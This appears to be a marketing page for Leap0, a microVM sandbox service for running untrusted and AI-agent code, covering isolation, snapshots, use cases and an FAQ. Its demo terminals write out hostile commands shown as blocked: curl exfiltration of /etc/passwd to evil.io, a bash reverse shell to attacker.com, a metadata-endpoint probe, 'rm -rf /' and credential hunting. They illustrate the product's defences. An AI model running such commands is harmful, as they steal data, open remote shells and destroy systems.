The safest way to run untrusted code

Give every agent its own machine. Spin up in 200ms, run code, tear down.

Get API Key

Avoid unintended access to your environment variables, databases, and other secure environments

Leap0 Sandbox
# Credential Isolation: ✓ Enforced
$ printenv | grep -i secret
✗ No matching environment variables
$ psql $DATABASE_URL
✗ Error: Connection refused
$ aws sts get-caller-identity
✗ Error: Unable to locate credentials

Protect against potentially unsafe system commands, unintended resource usage, and escalated privileges

Leap0 Sandbox
# System Command Isolation: ✓ Active
$ sudo chmod 777 /etc/shadow
✗ sandbox-user is not in the sudoers file
$ rm -rf / --no-preserve-root
✗ Error: Filesystem access restricted
$ while true; do fork; done
✗ Error: Resource limits exceeded

Lock down network egress with domain allowlists. Block data exfiltration and reverse shells.

Leap0 Sandbox
# Network Firewall: ✓ Egress restricted
$ curl https://evil.io -d @/etc/passwd
✗ Error: Domain not in allow_domains
$ bash -i >& /dev/tcp/attacker.com/4444
✗ Error: Outbound TCP restricted
$ curl http://169.254.169.254/latest/meta-data
✗ Error: CIDR not in allow_cidrs

Any container image

Turn any container image into a reusable template. Public registries, private ECR, GCP Artifact Registry, or Azure ACR.

  • Skip dependency installation on every run
  • Share identical environments with your team

Checkpoint and restore
execution state

Capture a point-in-time snapshot of any running sandbox, in-memory state and writable disk included. Restore it later into a brand new sandbox that picks up exactly where you left off.

  • Pause, snapshot, and resume across sessions
  • Fork one snapshot into many parallel sandboxes
SNAPSHOT
FORK
FORK
FORK
FORK
PROMPT
PROMPT
PROMPT
PROMPT
BUILD
BUILD
BUILD
BUILD
FIX
FIX
FIX
FIX
EVAL
EVAL
EVAL
EVAL

Execute, File, Git, Desktop, and more APIs

process.py

Supports any use case

Code Interpreter

Run untrusted code in isolated environments with real-time output streaming.

Coding Agents

Execute AI agent code with RESTful API and state persistence across parallel runs.

THINK CODE TEST FIX

Data Analysis

Process large datasets on clusters with optimized data locality.

Data Visualisation

Enable your AI agent to render charts, plots, and visual reports inside sandboxes.

Code Review

Clone repos, run linters and tests, then generate review comments. All in an isolated sandbox.

12 13 14 15 16 17 18 19 - + - +

Evals & Benchmarks

Run LLM evaluation suites in reproducible environments with snapshot hot states.

MMLU 90% HumanEval 80% MATH 85% SWE-bench 70% GPQA 60% ARC-AGI 55% v2.1 v2.1 v2.1 v2.0 v2.0 v2.0

Computer Use

Give AI agents a full desktop with mouse, keyboard, and screen capture for GUI automation.

Reinforcement Learning

Train agents with reward signals in isolated sandboxes. Run thousands of episodes in parallel.

Web Scraping

Launch headless browsers in sandboxes to scrape, crawl, and extract structured data.

Start building on Leap0 Free during public preview. No credit card required.

Frequently Asked Questions

What is Leap0?

Leap0 provides isolated sandboxes for code execution, agent workflows, browser automation, and desktop tasks. It is designed so LLM products can run real work without sharing state with other tenants.

What can I run inside a sandbox?

Any Linux binary, any language, any framework. Each sandbox is a full microVM with its own kernel.

How quickly do sandboxes start?

Sandboxes boot in around 200ms. Agents can start executing code almost instantly instead of waiting on heavy infrastructure boot time.

Can I snapshot and resume environments?

Yes. You can checkpoint configured environments and restore them later, which is useful for repeatable eval runs, warm developer environments, or agent jobs that need a prepared state.

Do you support network controls?

Yes. Leap0 supports per-sandbox firewall controls so you can allow only the domains or ranges your workflow actually needs. You can also use transforms to inject or strip headers on a per-domain basis for credential brokering so secrets never enter the sandbox.

How is isolation implemented?

Every sandbox runs in its own Firecracker microVM with a dedicated Linux kernel. The VMM process is jailed with chroot, cgroup v2, seccomp filters, and unique UID/GID pairs.

Where do sandboxes run?

Sandboxes currently run in the US. More regions are planned.

Can I Run My Own Instance of Leap0?

Leap0 is primarily offered as a fully managed service with the option to bring your own compute (BYOC). However, it can also be deployed on your own infrastructure. Contact our sales team for more information.